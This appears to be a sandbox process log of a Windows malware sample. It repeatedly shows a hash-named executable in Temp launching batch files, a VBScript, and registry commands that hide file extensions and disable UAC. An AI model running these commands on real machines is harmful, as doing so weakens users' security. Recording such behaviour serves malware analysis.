C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GoYgMsMU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iwkYMEMw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1397410998-452574074283940505149179424211773734281899517239-1261525213834832866"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZcIUYUUw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\rIAMAccI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "2028725122752435165276583696114929501015958134341577823000-1530691802927902092"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZyIcUMcI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-929043516-1541777163-1691134539-434295233-6521340781779287521896365605-1274709824"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QwAUkwsA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "9630034101188884700-929702436-1959189090-1111449273-72338353820389246451172867991"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gKAEAcUU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1552002492-1304379883-1859931463-376606024917772597635128455-333506462630586553"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "597072559-33919362211841098444056587497656992591371053768-1800735143-2054992817"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cSYogAIs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gUYsoYQc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1985729524-835445459-583205538-7274497641107066562-1372715323-425262637-1762804913"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LUYosYcQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-127589827-858645630-1624350009-1619904254-599176506105950975912758718201565754165"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "169349426864754629818273259821222083860-1650822325-155973531-1199579469-885364986"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JYcYAYEU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1694044765-6891120412976818181467533841-969713469-190585099912666426061372012205"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "6052215931957945482-314004617-4259453302114216962647923910443998954-154523009"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1497812969-5148095439803126331600507654-9331951201348641780-4555056111169254803"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LiUowIsI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-22370143419090483471510901341419627714-20395939212068521532153077058-1564734625"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LQQAcMgQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "377879575-1202911604-1930378794-423241462-1308409258-1135788462305048294-86383817"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aGMoQUgw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\qOIoIAMY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1653237630523632968-780773843297890839-351182943285675971203648498319006748"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "601484009-19340068141947020156461726530-8218668431163020947-963292442543469356"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KokEIMgE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZWkkcUQo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1204430981613066144-1137214729-174368645119626615812298479401301028227-385536489"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-16429557876778464-1423795083-1223911596637218386-26107974118311610561844969716"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "274332885643631700-1073421658-158725767459938022818057630431115498082-221619465"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1741733654-12779567751953693818-52518267-20682039311131976044-791103077-1499857222"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LascIQcM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "791578749-1052162916-1197602497924621078-1676167181-75723629914409032838796298"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1313776710-127748642013840550865820095341135956919-14188991071909625302-1109916457"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-134317576016337122-1770672522-11148093209658151191996804778-3586157782065839472"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vuMccQEQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "369435502-984855316-17474034612140319024-9061923969936491358514289-1737450480"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1056316033-203156177511906096231370390908-1025415278-15647663691405620824-223761642"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GQgMUcoo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-510479764-132276419-16094870781672261372184175319-1745346043-331252519-251989061"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

